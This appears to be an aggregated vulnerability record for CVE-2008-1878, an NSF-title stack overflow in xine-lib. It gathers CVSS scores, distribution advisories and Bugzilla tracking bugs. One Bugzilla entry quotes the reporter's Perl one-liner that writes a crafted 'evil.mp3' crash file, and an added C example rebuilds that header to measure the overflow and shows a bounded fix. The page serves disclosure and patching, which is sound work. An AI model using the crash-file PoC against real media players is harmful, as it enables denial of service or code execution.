CVE-2008-1878
Published 2008-04-17
Priority P3 · 50 · high · CVSS 2.0 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public
EPSS: 15.04% (96.3th percentile)
Stack-based buffer overflow in the demux_nsf_send_chunk function in src/demuxers/demux_nsf.c in xine-lib 1.1.12 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long NSF title.
Affected
8 ranges (only one carries version data)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xine | xine-lib | <= 1.1.12 | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vendor_redhat | — | 7.5 | HIGH | — |
| vendor_ubuntu | — | 6.8 | MEDIUM | — |
Ubuntu
xine-lib vulnerabilities
vendor_ubuntu · 2008-08-06 · CVSS 6.8 · CVE-2008-0073 [MEDIUM]
Alin Rad Pop discovered an array index vulnerability in the SDP
parser. If a user or automated system were tricked into opening a
malicious RTSP stream, a remote attacker may be able to execute
arbitrary code with the privileges of the user invoking the program.
(CVE-2008-0073)
Luigi Auriemma discovered that xine-lib did not properly check
buffer sizes in the RTSP header-handling code. If xine-lib opened an
RTSP stream with crafted SDP attributes, a remote attacker may be
able to execute arbitrary code with the privileges of the user
invoking the program. (CVE-2008-0225, CVE-2008-0238)
Damian Frizza and Alfredo Ortega discovered that xine-lib did not
properly validate FLAC tags. If a user or automated system were
tricked
Red Hat
xine-lib: buffer overflow in nsf demuxer (CVE-2008-1964)
vendor_redhat · 2008-04-17 · CVSS 7.5 · CVE-2008-1878 [HIGH]
GHSA
GHSA-22c4-4rv3-jj9h: Stack-based buffer overflow in the demux_nsf_send_chunk function in src/demuxers/demux_nsf.c
ghsa_unreviewed · 2022-05-01 · CVE-2008-1878 [HIGH] · CWE-119
GHSA
GHSA-7jwc-8h4q-2fgv: ** DISPUTED ** Stack-based buffer overflow in the demux_nsf_send_headers function in src/demuxers/demux_nsf.c
ghsa_unreviewed · 2022-05-01 · CVSS 7.5 · CVE-2008-1964 [HIGH] · CWE-119
** DISPUTED ** Stack-based buffer overflow in the demux_nsf_send_headers function in src/demuxers/demux_nsf.c in xine-lib allows remote attackers to have an unknown impact via a long copyright field in an NSF header in an NES Sound file, a different issue than CVE-2008-1878. NOTE: a third party claims that the copyright field always has a safe length.
No detection rules found.
Bugzilla
CVE-2008-1878 xine-lib: buffer overflow in nsf demuxer [EPEL-5]
bugzilla · 2008-04-24 · CVSS 7.5 · CVE-2008-1878 [HIGH]
+++ This bug was initially created as a clone of Bug #443056 +++
This is an automatically created tracking bug! It was created to ensure that one
or more security vulnerabilities are fixed in all affected branches.
You should *not* refer to this bug publicly, as it is a private "Fedora Project
Contributors" bug.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in "Blocks" field.
bug #442882: CVE-2008-1878 xine-lib: buffer overflow in nsf demuxer
Discussion:
%changelog
* Thu Apr 24 2008 Rex Dieter - 1.1.8-9
- CVE-2008-1878 (#443969)
---
http://buildsys.fedoraproject.org/build-status/job.psp?uid=38835
Bugzilla
CVE-2008-1878 xine-lib: buffer overflow in nsf demuxer (CVE-2008-1964)
bugzilla · 2008-04-17 · CVSS 7.5 · CVE-2008-1878 [HIGH]
Guido Landi reported following xine-lib issue to Full-Disclosure mailing list:
xine-lib title = strdup(&header[0x0E]);
demux_nsf_send_chunk():
122: char title[100];
162: sprintf(title, "%s, song %d/%d",
this->title, this->current_song, this->total_songs);
- Affected applications
http://xinehq.de/index.php/releases
- PoC
perl -e 'print "\x4E\x45\x53\x4D\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A" .
"\x41" x 114' > evil.mp3
Reference:
http://marc.info/?l=full-disclosure&m=120839374812553&w=4
Does not seem to be fixed upstream yet. Overflow is caught by stack protector.
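The report above gives the whole bug in two lines: the NSF title is taken with strdup(&header[0x0E]) and later formatted with sprintf() into a fixed char title[100]. The following C example is added here and is not xine-lib code or the reporter's PoC. It builds a 128-byte NSF header like the PoC (the "NESM\x1A" magic and 114 'A' bytes from offset 0x0E), computes how many bytes the original sprintf() would write without performing the unsafe write, and shows a hardened variant that honours the 32-byte title field and bounds the output. Assumptions: the header is 128 bytes, the title field starts at 0x0E and is 32 bytes per the NSF format, the stack buffer is 100 bytes as quoted, and the strdup() model stops at the header end (the real strdup would keep reading). All function names are the example's own.

```c
#include <stdio.h>
#include <string.h>

#define NSF_HEADER_LEN   128   /* NES Sound file header size (assumption) */
#define NSF_TITLE_OFF    0x0E  /* title offset, as used by the PoC */
#define NSF_TITLE_FIELD  32    /* spec size of the title field (assumption) */
#define XINE_TITLE_BUF   100   /* the "char title[100]" quoted in the report */

/* Constructed header: "NESM\x1A", version 1, 1 song, start song 1,
 * load/init/play addresses, then 'title_len' bytes of 'A' at 0x0E. */
static void nsf_build_header(unsigned char *hdr, size_t title_len)
{
    static const unsigned char prefix[NSF_TITLE_OFF] = {
        'N', 'E', 'S', 'M', 0x1A,            /* magic */
        0x01, 0x01, 0x01,                    /* version, songs, start song */
        0x80, 0x80, 0x18, 0x8A, 0x03, 0x8A   /* load, init, play addresses */
    };
    memset(hdr, 0, NSF_HEADER_LEN);
    memcpy(hdr, prefix, sizeof prefix);
    if (title_len > NSF_HEADER_LEN - NSF_TITLE_OFF)
        title_len = NSF_HEADER_LEN - NSF_TITLE_OFF;
    memset(hdr + NSF_TITLE_OFF, 'A', title_len);
}

/* Length strdup(&header[0x0E]) would copy. strdup() reads to the first NUL;
 * the PoC's title has none inside the header, so this model stops at the
 * header end (114 bytes) where the real call would read on. */
static size_t nsf_title_len(const unsigned char *hdr)
{
    size_t n = 0;
    while (n < NSF_HEADER_LEN - NSF_TITLE_OFF && hdr[NSF_TITLE_OFF + n] != '\0')
        n++;
    return n;
}

/* Bytes, NUL included, that the original
 *   sprintf(title, "%s, song %d/%d", this->title, cur, total)
 * would write. snprintf(NULL, 0, ...) only measures; nothing is written. */
static size_t nsf_format_len_needed(const unsigned char *hdr, int cur, int total)
{
    size_t tlen = nsf_title_len(hdr);
    int n = snprintf(NULL, 0, "%.*s, song %d/%d", (int)tlen,
                     (const char *)hdr + NSF_TITLE_OFF, cur, total);
    return (size_t)n + 1;
}

/* Triage check: would this header overflow the 100-byte stack buffer? */
static int nsf_header_overflows(const unsigned char *hdr, int cur, int total)
{
    return nsf_format_len_needed(hdr, cur, total) > XINE_TITLE_BUF;
}

/* Hardened variant: copy at most the 32-byte title field and bound the
 * formatted write. Returns 0 on success, -1 if 'out' is too small. */
static int nsf_format_title_safe(char *out, size_t outsz,
                                 const unsigned char *hdr, int cur, int total)
{
    char name[NSF_TITLE_FIELD + 1];
    size_t n = 0;
    while (n < NSF_TITLE_FIELD && hdr[NSF_TITLE_OFF + n] != '\0') {
        name[n] = (char)hdr[NSF_TITLE_OFF + n];
        n++;
    }
    name[n] = '\0';
    int w = snprintf(out, outsz, "%s, song %d/%d", name, cur, total);
    if (w < 0 || (size_t)w >= outsz) {
        if (outsz)
            out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    unsigned char hdr[NSF_HEADER_LEN];
    char out[XINE_TITLE_BUF];

    nsf_build_header(hdr, 114);            /* the PoC's 114-byte title */
    printf("PoC title: %zu bytes, sprintf needs %zu, buffer is %d -> %s\n",
           nsf_title_len(hdr), nsf_format_len_needed(hdr, 1, 1),
           XINE_TITLE_BUF, nsf_header_overflows(hdr, 1, 1) ? "OVERFLOW" : "ok");
    nsf_format_title_safe(out, sizeof out, hdr, 1, 1);
    printf("hardened output (%zu chars): \"%s\"\n", strlen(out), out);

    nsf_build_header(hdr, 31);             /* a title that fits the spec field */
    printf("benign title: needs %zu -> %s\n", nsf_format_len_needed(hdr, 1, 1),
           nsf_header_overflows(hdr, 1, 1) ? "OVERFLOW" : "ok");
    return 0;
}
```

With the PoC header the measured write is 125 bytes (114 title bytes, the ", song 1/1" suffix and the NUL) against a 100-byte buffer, which is the overflow the stack protector catches in the note above; the hardened path yields a 42-character string regardless of how far the title runs.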
Discussion:
Created attachment 302736
Reporter's PoC
---
Exploit is now also on milw0rm:
http://milw0rm.com/exploits/5458
---
Upstream pat
References
http://lists.opensuse.org/opensuse-security-announce/2008-06/msg00001.html
http://secunia.com/advisories/29850
http://secunia.com/advisories/30021
http://secunia.com/advisories/30337
http://secunia.com/advisories/30581
http://secunia.com/advisories/31372
http://secunia.com/advisories/31393
http://security.gentoo.org/glsa/glsa-200808-01.xml
http://www.debian.org/security/2008/dsa-1586
http://www.mandriva.com/security/advisories?name=MDVSA-2008:177
http://www.mandriva.com/security/advisories?name=MDVSA-2008:178
http://www.securityfocus.com/bid/28816
http://www.ubuntu.com/usn/usn-635-1
http://www.vupen.com/english/advisories/2008/1247/references
https://exchange.xforce.ibmcloud.com/vulnerabilities/41865
https://www.exploit-db.com/exploits/5458
https://www.redhat.com/archives/fedora-package-announce/2008-April/msg00536.html
https://www.redhat.com/archives/fedora-package-announce/2008-April/msg00571.html